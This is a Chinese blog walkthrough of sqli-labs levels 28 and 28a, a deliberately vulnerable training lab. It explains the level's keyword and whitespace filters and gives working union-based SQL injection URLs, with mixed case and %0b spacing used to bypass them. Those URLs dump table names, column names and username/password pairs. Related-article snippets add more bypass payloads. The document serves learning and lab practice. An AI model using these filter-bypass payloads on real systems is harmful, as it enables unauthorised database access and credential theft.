Sqli-labs之Less-28和Less-28a

最新推荐文章于 2022-07-22 15:40:14 发布
最新推荐文章于 2022-07-22 15:40:14 发布
阅读量1.4k 收藏 4
点赞数 2
分类专栏: Sqli-labs环境通关教程-学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934520/article/details/105801767
版权

                                                    Less-28

基于错误的,单引号字符型,过滤了union和select等的注入

判断注入类型

11"正常回显,1'报错,单引号字符型。
2'%26%26'1'='1回显为id=1,有小括号。

参看源码:

 

发现没有过滤orand
过滤了相连的unionselect/i同时匹配大小写,\s匹配任意空白字符如制表符、换行符、空格等,使用%a0等空格的URL编码可以绕过。
过滤了--#以及/**/
过滤了两次空格
过滤了/但没过滤\

这一关和Less-27a十分相似,可以利用联合注入,布尔盲注,延时注入。

这里演示联合注入:

爆库:

?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1 

爆表:

?id=0')%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b('1')=('1

暴字段:

?id=0')%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b('1')=('1

爆数据:

?id=0')%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0bwhere%0b('1')=('1

================= 分隔符 ==============

                                                    Less-28a

基于盲注的,带括号的单引号字符型,过滤了union和select等的注入

本关与 28 基本一致,只是过滤条件少了几个。

参考源码:

这一关应该设置成带括号的双引号字符型比较好。

联合注入和28关一模一样具体操作自行尝试。

推荐两篇绕过文章:

深入理解SQL注入绕过WAF和过滤机制
SQL注入绕过union+select过滤

完。

 

红烧兔纸
关注
专栏目录
sqli-labs ----less-26---37--练习
代码审计
03-07 1006
sqli-labs————Less-26(绕空格、/*、#等) 该关卡提示空格和注释被转义,我们测试一下: http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错, 我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm
sqli-labs Less-26、26a、27、27a、2828asqli-labs闯关指南 26、26a、27、27a、2828a)—Advanced injection
m0_54899775的博客
12-25 1378
sqli-labs Less-26、26a、27、27a、2828asqli-labs闯关指南 26、26a、27、27a、2828a)—Advanced injection
sqli-labs:less-28a
羽的博客
10-11 135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqlilabs less-28~less-28a
TA不懒,但还没有添加简介
07-22 787
sqlilabs less-28~less-8a
sqli-labs (less-28 and less-28a)
kukudeshuo的博客
03-12 994
sqli-labs (less-28 and less-28a) less-28 进入28关,输入ID=1 查看源代码 这里发现基本与27关一样,依然采用大小写混合绕过 http://127.0.0.1/sql1/Less-28/?id=1' #回显错误 http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示 判断闭合方式为’);%00,并且为字符型注入 确定回显位置 http://127.0.0.1/sql1/Less-28/?id=111') %a0 Un
Less 28-28a
老司机开代码的博客
08-04 545
文章目录题目分析 题目分析 首先题目告诉我们会吃掉我们的union和select。 然后通过?id=1')%26%261=1;%00测试出来,id的是被('')包裹的。 接着看一下源码的blacklist function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_repl
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1776
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1828
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sqli-labs(23-28a
ximo的博客
02-04 333
目录Less-23Less-24Less-25Less-25aLess-26Less-26aLess-27Less-27aLess-28Less-28a Less-23 这一关按照一般的步骤操作时,发现使用 # --+等注释符并不能起到作用,查看源码,发现: 注释符都被过滤为空,这里有两种选择: 1.不使用注释符,使用 ’ 构造语句将后面的 ’ 闭合。 ?id=' union select 1,2,database() ' 2.使用;%00进行截断(MySQL特有) 以上两种方式皆可。 注意:使用第一
sqli-labs————less-28a
Fly_鹏程万里
05-16 687
Less-28这一关于之前的28关基本上一致,只不过在过滤条件部分少了几个,但是这并不影响我们的注入,对于注入原理还是不变的,下面直接给出payload,因为这几关的相似度太大了,而且只要明白 一关的过关方法,那么其他关的过关方法也就知道了。payload:http://192.168.11.136/sqli-labs/Less-28a?id=-1%27)unIon%0bsElect%0b1,@@...
sqli-labs————Less-28
Fly_鹏程万里
05-16 1133
Less 28这一关于之前的27关没有什么差别,这里直接给出一个payload,用户可以自己思考自我测试,如果有不清楚的可以查看之前的第27关的详细介绍。payload:http://192.168.11.136/sqli-labs/Less-28?id=1')union%a0select(1),(user()),(3)||('1...
[靶场] SQLi-Labs Less28-Less36
3hex的博客
09-26 232
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 31.Less28 请求方式 注入方式 类型 备注 GET 基于报错注入(Union内联注入) 字符型 过滤关键词select、union以及组合,单引号、括号闭合 1. 正常提交 http://127.0.0.1:8003/Less-28/?id=1 2. 语句报错 http://127.0.0.1:8003/Less-28/?id=1 1'2"3 http://127.0.0.1:8003.
sql-labs】闯关记录28~38详解
qq_43665434的博客
04-24 636
sql-labs】闯关记录28~38 【less-28】过滤union%0aselect 测试流程 ?id=1') and%0a'1'=('1 #成功回显 ?id=1') and%0a'1'=('2 #会显失败 #测试回显字段 ?id=232323') %0aunion%0aselect%0a1,2,3%0aand%0a'1'=('1 #发现union%0aselect被过滤了 #于是混淆双写,成功绕过 ?id=232323') %0auniunion%0aselecton%0aselect
SqliLab Less23-28 WriteUp
jhzzzz的博客
01-24 258
文章目录二次排序注入绕过注释符注入 二次排序注入 绕过注释符注入
sqli-labs:less-28(过滤了union和select)
羽的博客
09-15 296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
sqli-labs (less25-less28a)
Xi4or0uji
08-04 452
这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长 less 25 or &amp;&amp; and 至于怎么绕? 大小写:Or、oR 重复:oorr、anandd 符号:&amp;&amp;、|| 各种编码:0x.....、unicode 然后..........没有然后了(想不到了 剩下的payload顺便给一给 ?id=1' oorr extract...
绕过waf mysql爆库_sqlilab-Less-21-30-writeup
weixin_39673303的博客
02-01 142
Less-21 基于错误的Cookie头单引号字符型注入跟Less-20是一样的,看了下源码确认是可以在cookie头进行SQL注入,但是Less-21做了一点修改,就是输入到源码中的代码需要经过base64编码才可正常注入,因为源码是直接对cookie参数进来的数据进行解码GET /Less-21/ HTTP/1.1Host: 106.54.35.126User-Agent: Mozilla/5...
Sqli-labs Less25-28 绕过过滤函数对字符的过滤 - GET
kevinhanser
08-10 545
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 25: GET - Error based - All your OR &amp; AND belong to us - String Single Quote 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; function...
sqli-labs/Less-28
最新发布
01-09
1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值